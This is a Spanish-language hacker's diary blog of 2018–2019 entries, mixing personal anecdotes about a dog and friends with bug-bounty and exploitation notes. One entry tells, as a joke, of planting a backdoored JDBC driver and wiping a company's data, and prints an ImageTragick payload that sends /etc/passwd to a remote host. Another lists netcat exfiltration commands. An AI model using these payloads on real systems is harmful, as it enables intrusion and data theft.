Archivos de la categoría hacking

No hay comentarios

Miércoles, 6 de Febrero de 2019: Dos es mejor que uno

  por , , , , ,

Querido Diario…

A pesar de que tengo una máquina virtual en donde dice que tengo instalado Windows de 64 bits; al sólo tener un microprocesador Genymotion lo detectó como de 32 bits, evitando ejecutar un Android cargado en un Samsung S9. Y hasta que no agregué un segundo procesador a la máquina virtual fue que ejecutó la máquina virtual de Genymotion… oh si, virtualización sobre virtualización 😛 RAM a toda prueba, y luego hay quienes dicen que las Macbook no son pro 😛 … I Apple.

Pero bueno… después de que ya está todo corriendo, coff.. coff.. ¿cómo se le hace para usar un Android? jajaja 😛 no es que sea payaso, pero… no tengo ni idea de que botón apretar 😛

También tengo otro problema (oh si, ya había olvidado que en el researching todo el tiempo uno se la pasa en problemas), el “dispositivo” no carga. Venía con media carga de fábrica, y el domingo le usé y quedó como a mitad de carga, pero ahora que lo conecto, no veo que cargue, ya lo hice a la electricidad y a la computadora por un puerto USB y nada.. hum… vaya a ser que como es patrocinador está defectuoso D:

Pff…

Querido Diario… hay un unicornio en la cocina.

No hay comentarios

Jueves, 8 de Noviembre de 2018: Seguiré mis sueños e ilusiones

  por , , , , ,

Querido Diario…

H0y fuimos a comer para despedirnos, si los países se encuentran en posición, las estrellas se alinean y los sacrificios son escuchados; tal vez hoy fue su último día en Mexicali… en México.

- ¿Y ahora qué será de ti?, te va a parar la policía, vas a chocar, te van a mal influenciar... - dijo de forma bastante seria
- Si... de hecho, necesito una conciencia; tal vez tome una nueva. Hum... hum... hum... bueno ya pensaré en alguna. ¿Sabes?, he estado pensando
- ¿En qué? - dijo mientras le tomaba una foto a la comida y la enviaba a sus inquisidores por mensaje
- Creo que debo de hacerte caso... es el momento de cambiar, de aprovechar lo que el poderoso Quetzalcoatl me ofrece, es el momento de seguir mis sueños. - justo en ese momento recordé a Lalo y Lalo2

- ¿Ah si?, ¿qué vas a ser?, ¿dejarás la vida turbia e ilegal o regresarás a tener un empleo normal? - me miró aun escribiendo por el celular, sin imaginar lo que venía por respuesta.
- Si... me jubilo, adios la vida turbia e ilegal; voy a ir la próxima semana a despedir. Es el fin, se acabó... no más... es tiempo de tener una vida normal - se le abrieron los ojos, dejó de escribir... por suerte, no tenía té en la boca o lo hubiese escupido.

- No te creo - se rió - no, no... me intentas, ¿cómo dices?, ¿chamaquear?
- No, lo digo en serio... es tiempo de mirar al futuro, de hacer cambios, cambios importantes. 
- ¿Qué harás?, ¿por qué ahora?... noooo.. quiero enterarme - empezó a creerlo
- Es una sorpresa, lo tengo que anunciar en grande, frente a todos; además... aunque se que me van a matar, tengo que mostrar mi agradecimiento a toda la H. Organización Turbia e Ilegal... los llevaré - me puse melancólico - siempre en mi corazón
- Pero, ¿qué harás?, ¿de qué vivirás?
- Ouuu... ya verás, tengo tantas opciones... más o menos me ofrecen un empleo por día.. creo que... tengo de donde elegir.

- Decenas... no... tal vez cientos de personas, entraran en shock con el anuncio que haré; y ya sé en donde lo hará... en el próximo NoTrustSex.. digo Sec: https://www.meetup.com/es/NoTrustSec/events/256251030/ ... hum... lástima, estarás al otro lado del mundo para enterarte
- Grrrr...

Querido Diario… va a ser un notición… ¿qué será lo que tengo que decir?, bueno… hay que esperar una semana para saberlo… les espero en el NoTrustSec de la Ciudad de México, en donde contaré algo, que volverá loca a la gente 😛

Querido Diario…

Chan, chan, charán…

Un comentario

Miércoles, 17 de Octubre de 2018: No soporté la presión

  por ,

Querido Diario..

Me lo pidió mucha gente.. me negué, me lo siguieron pidiendo; personas que ni conocía de Chile, amigos de Argentina, México… incluso durante la organización de otros eventos me lo pedían; hasta el viernes pasado donde en la fiesta de cumpleaños de Luis, mucha gente me insistió e insistió…

Me tomé un trago de bourbón y prometí…

Querido Diario… ¿para qué planear?, es mejor hacer las cosas sin pensar… pues bueno, espero que de tanto que me insistieron, alguien me ayudé por allí.

Un comentario

Martes, 16 de Octubre de 2018: Un criminal solitario

  por , , ,

Querido Diario…

Iba tranquilamente manejando sobre Av. Justo Sierra, yendo hacia Baires para comer, cuando de pronto me llegó un mensaje.

Llevaba tiempo que no teníamos una misión, así que inmediatamente me coordine con el equipo para avanzar, lo más pronto posible. Marqué a la persona de mayor confianza.

- Bueno
- ¡Joven!
- ¿Qué cuenta joven?
- Pues nada, aquí con un encarguito
- ¿Qué clase de encarguito? - le cambió el tono de voz, a uno más serio
- Mom me pidió ir a dar unos tehuacanazos
- ¡Huuuuy joven!, creo que eso no se va a poder... pero dame una semana y lo vemos - y me colgó

Hum.. diablos, el elemento más turbio y confiable de esta H. Organización Turbia e Ilegal no estaba disponible; pero al menos espero me traiga un recuerdito. Entonces, le marqué a la segunda opción.

- Bueno - se escuchaba una voz grave y cansada, como de alguien que lleva varios días sin dormir
- ¡Joven!
- ¿Qué pasó?
- ¿Qué haces? - dije yo, intentando ocultar el verdadero motivo de mi llamada
- Viendo el partido
- ¿Cual partido?
- Pues el partido
- Hum.. pero ¿partido de que o qué?
- Hum... ¿de futbol? - algo me decía que no me estaba diciendo la verdad
- ¿En lunes?
- ¿No hay partido los lunes?
- Creo que no
- Ouuuu... - lo había atrapado
- Estas cuidando de la bebé, ¿cierto?
- Si joven, llevó una semana sin dormir y mis tarjetas están en negativo - dijo casi llorando
- Hum... joven, algo me dice que esto no va a funcionar. Básicamente ya no puedo mandarte a ninguna misión turbia e ilegal, me sentiría mal si esa niña se queda huérfana
- ¿Hay una misión turbia e ilegal?, ¿hay bono extra?
- Joven - me pusé serio
- ¿Si?
- Nos vemos en 18 años, joven
- Demonios... mi carrera criminal ha durado poco - y le colgué

Bueno, siempre hay una tercera opción

- Bueno
- ¿Qué tranza? - me respondió con ese barrio iztapalapense que brinda confianza en este tipo de escenarios
- ¡Janey!, ¿qué estas haciendo?
- Noviando con El Chino
- Ouu... 
- ¿Necesitabas algo?
- Pozolear a un criminal
- ¿No podemos esperar para mañana? - me dijo, plenamente interesada
- No
- Ouuu.. marcarle a Lalito
- No puede
- ¿Al Becario?
- Tampoco
- Hum... seguro tú podrás resolverlo, siempre puedes. Nos vemos Belindo - y me colgó

Hum… este equipo no está resultando. Así que miré a Shellcode, me miro, nos miramos.. y determiné que yo mismo haría la misión turbia e ilegal, al final, por eso soy el lugarteniente de esta H. Organización Turbia e Ilegal, yo podía hacerlo sólo. Y me puse a trabajar en ello.

Ouu… bueno, tal vez mi única compañera no me acompañaría en la misión.

Me senté frente a la computadora, la miré fijamente… y me di cuenta que no tenía la menor idea de que hacer; así que me di cuenta que en realidad ya estoy muy viejo, y sin equipo no soy nada. Lo único que se me ocurrió es utilizar las únicas técnicas que conozco: chamaquear a alguien.

Por suerte me di cuenta de alguien que trabajaba en ese sitio y que me iba a ser de utilidad.

- ¿Y qué haces allí?
- Ahhh pues... no mucho, me encargo como de todo - eso pasa cuando se es la sobrina del dueño - ¿y tú que haces?
- Nada, aquí aburrido... vamos a comer
- Ok, pero me esperas a que terminé unas cosas
- Si, claro... salgo para allá y de allí nos vamos

Llegué a su oficina y rápidamente empecé a explorar la red. No es una empresa muy grande, así que me encontré ShareEnum que tenían directorios compartidos para varías cosas, incluyendo un “repositorio” de librerías de los programadores. Vi que hacían uso de aplicaciones en Java y las conectaban a los servidores de bases de datos haciendo uso de JDBC, así que, basándome en un paper de un researcher llamado Airman, modifiqué los el driver así:

import java.sql.*;

public class JDBCBackdoorTest {
public static void main(String[] argsStrings){
try{
Connection conn = DriverManager.getConnection("jdbc:blah://bigshot.beer:31337/");
} catch(Exception e) {
e.printStackTrace();
}
}
}

Listo, lo dejé allí y me fui a comer con Priscilla.

Más tarde al llegar a casa me di cuenta que al menos tres desarrolladores habían utilizado el driver para conectarse. Me puse los audífonos y puse la play list especial de hackeo: https://open.spotify.com/playlist/0EfZGNw0JHvoCkNfnMDYAU

¿Qué es lo que hace el driver?, bueno… simplemente ejecuta comandos en la consola, con eso obtuve acceso remoto a la red de la súper empresa segura. Mom no quería más que destruir todo, así que…

Sólo antes de borrar todo y colapsar a todos, quería probar el CVE-2016-3714:

push graphic-context 
viewbox 0 0 640 480 
fill 'url(localhost"|curl "`curl MyHost/i/?imagewarn --data @/etc/passwd`)' 
pop graphic-context

Y…

Ya después de que deje de jugar, entonces si, borré todo…

Querido Diario…

Regresé a casa y me puse a trabajar en el primer assessment que me asignaron, a pesar de que mi profile está pensado para aplicaciones, me dieron un network security assessment 😛 no saqué nada… así que, necesitaba un poco de despejar la mente para poder seguir trabajando.

- ¿Cómo te fue? - me preguntó mientras me pasaba una tarta de pistache y ella se quedaba con la de chocolate; de las que venden en Raphael; frente al Carl's Jr
- Bien, cansado... pero creo que bien; se ven esperanzas
- ¿Qué es eso de [...]? - me preguntó, yo le había comentado en al semana que estaba muy emocionado por eso
- Es un programa privado de bug bounty.... lo de las recompensas
- Te notas muy feliz por eso
- Si - dije pensando - me gusta mucho, me hace sentir que aun sirvo para algo
- ¿No extrañas trabajar en eso?
- Si, moriría de ganas de poder hacerlo nuevamente
- ¿Y luego? - mi miró con esa mirada que tiene de "hazlo"
- Hum... mejor retirarse en la cima - evadí la pregunta
- ¿Qué sientes? - me preguntó. Perfectamente sabía a que se refería
- Duele
- ¿Qué tanto?
- Mucho... duele el pecho, duele todo... es como algo que presiona; duele no poder dar un beso, duelen los brazos al no poder abrazarle... duele no poder siquiera escuchar su risa o su voz
- Hum... 
- Hey, basta.. cuéntame... ¿cómo te fue hoy?

- Hum... mejor no, ¿tienes prisa?, ¿vamos al cine?. Vamos a ver Venom, aunque no te gusten las películas de súper héroes
- Vale,... ¡vamos!, pero pediremos nachos; con muchos jalapeños y Pepsi, porque la Coca-cola, yiuck...

Nunca entenderé porque a la gente le gustan las películas de súper héroes; me parecen muy aburridas y predecibles.

- ¿Cual es tu película favorita? - me preguntó mientras íbamos de regreso al coche
- Moulin Rouge - dije
- ¿Por qué?
- Hum... no lo sé; me gusta la historia. Un tiempo le vi tanto que hasta los diálogos me aprendí

- Eres raro - dijo de pronto
- Hum... no sé como tomar eso - le respondí arremendandole
- Nos vemos terrorista cibernético; intenta dormir
- Trataré...

Me quedé fuera de la casa, en un columpió, viendo como Shellcode se peleaba con la manguera del agua… y pensando en lo que tanto me repitieron la semana pasada. Pensé y pensé… y al final recordé que… lo mejor es no planear, sino sólo actuar. Y entonces, lo decidí… lo voy a hacer.

 

No hay comentarios

Viernes, 28 de Septiembre de 2018: El perro del otro lado del espejo

  por , ,

Querido Diario…

Me acabo apenas de dar cuenta que Symantec adquirió hace muchos años LopthCrack. Poco antes liberaron su versión 7 (yo me quedé en la 6), pero jamás le dieron más continuidad, porque las regulaciones de EEUU prohibieron que pudiese ser comercializada. Y si… me he preguntando: entonces, ¿ahora como le hace el mundo para sacar hashes?, bueno… como ya no hay LC, pensé en pwdump, pero desde pwdump7 no ha habido una nueva versión. ¡Demonios!, hoy todo mundo usa Mimikatz.

¿Ah si?, ¿por qué quiero sacar unos hashes?… bueno, un command injection.

Aunque no lo creas aun se pueden encontrar estas cosas por el mundo… lo complejo de esto es que imagina un escenario con dos servidores, uno de ellos es tu objetivo, pero no está expuesto, el otro es donde está el command injection; y desde allí hay que saltar al interno… pero no tengo ninguna cosa para administrarlo, pero ya cree un usuario de dominio 😛

Lo sé, parece escenario de CTF, pero no… ya sabes como odio los CTF, esto es un coff.. coff.. banco coff.. coff.. es un buen bounty 😛 coff.. coff… ¿para qué?, bueno…

En realidad no, ya casi termina el calor… “termina”, en Mexicalli jamás termina el calor, el invierno es como un verano chilango; pero Shellcode ya pude salir sin miedo. Pero… lo que nos hemos dado cuenta es que no cabe en un coche; y eso que aun es chiquita, así que, ya sé que voy a hacer si gano el bounty.


En ese color azul-morado 😛

Pero.. primero tengo que ver como resuelvo el problema de la administración usando el usuario que cree y jumpeando desde el servidor con el command injection.

Querido Diario… aun tengo cierto atractivo en el mundo….

Aunque ya sabemos que respondí… por otra parte, Querido Diario… ¿los perros podrán ver su reflejo?, y si lo ven… ¿son capaces de saber si el reflejo son ellos o piensan que es otro perro?, los peces no pueden saber que se trata de ellos mismo. Y algo me dice que Shellcode tampoco puede saberlo; acá podemos ver a la señorita heredera de la valentía de todo labrador.

Querido Diario… creo que es momento de tomar un descanso, y terminar al fin el 10mo Doctor. Después de llorar a moco suelto por el capítulo donde el Doctor al fin logra volver a ver a Rose.

No hay comentarios

Viernes, 7 de Septiembre de 2018: Copypasteishon

  por , ,

Querido Diario…

Siempre mover archivos dentro de una red es un poco truculento; y ahora con los IDS’s o las herramientas de DPL, puede ser un martirio más grande. Desde montar compartidos que puedan ser leídos desde donde sea, usar el administrador de conexión de DRP que no sé porque ese si deja, pero una conexión de terminal service normal no, y como siempre, el confiable netcat.

Con netcat podemos mover archivos con gran facilidad, con un sólo comando; aunque los IDS’s comúnmente lo detectarán.

Algunos movimientos simples que pueden servirte, no sé… por ejemplo cuando estas echo bolita dentro de un parlamento extranjero, con ganas de secuestrar a la ministra de economía; o meterlo un tiro al primer ministro… pueden ser estos:

Exfiltraciones:

nc -l -p 12345 > "archivo"

nc -l -p 12345 | tr -d $'\x0d' | base64 -d > "archivo"

Descargas:

nc -l -p 12345 < "archivo"

base64 "archivo" | nc -l -p 12345

Querido Diario, no me gusta el escocés..

No hay comentarios

Miércoles, 5 de Septiembre de 2018: Lo lindo de lo simple

  por , , ,

Querido Diario…

Haya por los años del quién sabe cuando que no recuerdo, Microsoft, hizo una modificación interesante a la forma en que se venía llamado a los Exceptions Handlers; en Windows XP SP1.

Los Exception Handlers son una cadena de “objetos” (en realidad no son objetos, pero llevo todo el día intentado recordar como se llaman exactamente… creo que estructuras, pero no recuerdo, me quedé dormido en esa clase xD), en donde se tienen dos elementos, uno es un puntero al siguiente Exception Handler, y otro es el puntero hacia la acción que va a ejecutar ese Exception Handler. Lo que inicialmente hacían los hackers para explotar algún fallo que encontraban, era modificar el salto del EIP disparando un Exception Handler, y a su vez el Exception Handler, te mandaba hacia una dirección modificada. Para hacer eso, se tenía que ingresar directamente a la dirección de memoria del Exception Handler.

Lo que hizo Microsoft para evitar fue esto, es extremadamente sencillo. Cada que ntdll.dll dispará el SEH Chain (el inicio de la cadena de Exception Handlers) se “XORean” todas las direcciones, de esa forma antes de usarse tienen un 0x00000000, es decir.. se borra todo y se inutilizan. Y listo, así de sencillo no es posible alocar una shellcode allí. Después en Windows 2003 server implementaron el mismo cambio.

Microsoft… siempre a la vanguardia en seguridad, muy por encima de todos los S.O.’s…. (escuche un par de linuxeros rabiar y llorar por allí coff.. coff… esa cosa que aun tiene BOF’s es 2018 😛 )

Lo interesante de esto… es que es muy limpio y muy sencillo, y totalmente válido hasta la fecha para evitar la alocación directa de algún payload en una dirección de memoria. Lo que evita un clásico pop ret, ret, ret o un pop %eax o un mov directo, etc..

Querido Diario…

Siempre me ha encantado los cíclidos por su temperamento. Adoraba los Oscares, y siempre quise un FH…

No hay comentarios

Martes, 28 de Agosto de 2018: Chou me, baby!

  por , ,

Querido Diario…

Ya que no pude sacar el bounty por “Authorization bypass” hoy he estado trabajando en otra cosa que parece que tuvo mayor fruto. Y de nuevo es como volver a las viejas tecnologías. En este caso JSON. Cuando recién salió Angular JS todo era horrible, ya no se podía soltar solo Acunetix a lo loco y sacar un montón de juicy bugs, ahora todo cambiaba. De hecho la primer vez que me encontré con JSON fue revisando unas aplicaciones muy raras cuando vivía en un pueblo llamado Aguascalientes.

Pues bien, GraphQL no usa exactamente JSON, pero si envía un chorro (un shoooorro) de información que podría resultado medio sensible. Así que sólo hay que configurar el filtro de Burp Suite para poder cachar cosas como usuarios, sesiones, API keys, etc.

Y coff… coff…

Ouuuu si, te recomiendo que revises la documentación de la API que estes consumiendo (en este caso si es un API), porque así puedes saber el tipo de filtros que debes de configurar en Burp Suite.

Espero ahora si pegue, porque ya necesito algo de dinero, después de que me cobraron el deducible del seguro del Mustang mi tarjeta se ve muy, muy, MUY fea.

Querido Diario, quiero cambiarle de alimento a Shellcode, creo que le falta algo de peso y altura, la veo muy chaparrita. ¿Dónde puedo conseguir en Mexicali este alimento?

 

… creo que todo mundo cree que soy una mala persona.